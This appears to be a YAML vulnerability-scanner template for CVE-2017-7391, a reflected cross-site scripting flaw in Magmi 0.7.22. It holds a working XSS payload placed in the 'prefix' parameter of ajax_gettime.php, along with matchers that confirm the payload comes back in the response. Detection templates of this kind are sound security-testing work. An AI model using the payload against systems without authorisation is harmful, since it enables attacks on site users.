30 lines
967 B
YAML
30 lines
967 B
YAML
id: CVE-2017-7391
|
||
|
||
info:
|
||
name: Magmi – Cross-Site Scripting v.0.7.22
|
||
author: pikpikcu
|
||
severity: medium
|
||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||
tags: cve,cve2017,magmi,xss
|
||
reference: https://github.com/dweeves/magmi-git/issues/522
|
||
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
|
||
|
||
requests:
|
||
- method: GET
|
||
path:
|
||
- "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: status
|
||
status:
|
||
- 200
|
||
- type: word
|
||
words:
|
||
- '"><script>alert(document.domain);</script><'
|
||
part: body
|
||
|
||
- type: word
|
||
words:
|
||
- "text/html"
|
||
part: header |